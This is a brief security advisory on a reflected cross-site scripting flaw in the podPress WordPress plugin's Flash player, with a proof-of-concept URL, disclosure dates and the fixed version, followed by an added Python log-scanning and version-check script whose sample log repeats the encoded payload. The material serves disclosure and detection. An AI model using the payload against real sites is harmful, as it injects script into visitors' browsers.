———————————————————————————————————————–
podPress adds a lot of features designed to make WordPress the ideal platform for hosting a podcast.
————————————————————————————————————————-
vulnerable path:
/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf
vulnerable parameter: playerID
POC:
/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//
————————————————————————————————————————-
————
Patch:
————
– Vendor was notified on 25/02/2013
– Vendor released version 8.8.10.17 on 19/03/2013, which fixed the bug
————————————————————————————————————————-
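An added example, not part of the original advisory or the podPress project: a check over web server access logs for requests to the player SWF whose playerID is not a plain identifier, plus a comparison of an installed version against the fixed release 8.8.10.17. The log format, the allow-list pattern for IDs and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path, parameter and fixed release are taken from the advisory.
SWF_PATH = "/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf"
PARAM = "playerID"
FIXED_VERSION = (8, 8, 10, 17)

# Assumption: legitimate player IDs are short alphanumeric tokens.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Assumption: common/combined access log format with a quoted request line.
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    f'198.51.100.7 - - [20/Mar/2013:10:01:02 +0000] "GET {SWF_PATH}?playerID=1 HTTP/1.1" 200 4711',
    f'203.0.113.9 - - [20/Mar/2013:10:05:40 +0000] "GET /blog{SWF_PATH}'
    '?playerID=%5C%22))%7Dcatch(e)%7Balert(/xss/)%7D// HTTP/1.1" 200 4711',
    '198.51.100.7 - - [20/Mar/2013:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]


def suspicious_requests(log_lines):
    """Return (line_no, decoded playerID) for requests to the player SWF
    whose playerID is not a plain identifier."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # endswith() also covers WordPress installed in a subdirectory.
        if not url.path.lower().endswith(SWF_PATH.lower()):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if not SAFE_ID.fullmatch(value):
                hits.append((no, value))
    return hits


def is_vulnerable(version):
    """True if a dotted podPress version string predates the fixed release."""
    return tuple(int(n) for n in re.findall(r"\d+", version)) < FIXED_VERSION


if __name__ == "__main__":
    for no, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {no}: suspicious playerID {value!r}")
    print("8.8.10.13 vulnerable:", is_vulnerable("8.8.10.13"))
```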